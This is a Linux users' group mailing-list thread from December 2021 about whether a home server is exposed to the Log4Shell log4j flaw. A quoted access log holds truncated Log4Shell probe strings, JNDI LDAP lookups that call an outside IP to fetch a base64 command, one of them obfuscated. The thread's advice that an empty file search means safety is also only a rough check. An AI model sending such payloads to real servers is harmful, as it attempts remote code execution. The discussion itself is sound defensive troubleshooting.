This might be able to find out if your system has any traces of log4j installed:

sudo find / -name '*log4j*' -print

If that doesn't output anything, you are most likely safe.

From: Chris Thompson via WLUG <wlug@lists.wlug.org>
Sent: Wednesday, December 15, 2021 3:40 PM
To: wlug@lists.wlug.org <wlug@lists.wlug.org>
Cc: Chris Thompson <wolcen@riseup.net>
Subject: [WLUG] Re: Bug in the news

httpd does not use log4j.

solr, on the other hand, normally does.

...and Minecraft, if that applies to your server :P

~Chris

On 12/15/21 15:26, Keith Wright via WLUG wrote:
> Michael Voorhis <mvoorhis@mcvau.net> writes:
>
>> Log4j is a Java logging library.
>> If you're running apache and not using Java,
>> I don't think you need to be concerned.
>>
>> See here...
>>
>> https://en.wikipedia.org/wiki/Log4Shell
> Interesting link, thanks for that.
>
> I don't use Java, but is Apache using it without my knowledge?
>
> NB: I am a bear of little brain.   -- Pooh
>      I can't. I don't know how it works! -- OZ
>
> I find in /var/log/httpd/access_log
>
> 95.54.160.149 - - [15/Dec/2021:12:59:07 -0500]
>    "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1c ...
>       ...
>    "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:
>       //195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgL ...
>    ...
>
> So they are trying. How can tell if they succeeded?
>
> I have "gij" installed (by distro). I didn't know that two hours ago.
>
> What would break if I just deleted that?
>
>     -- Keith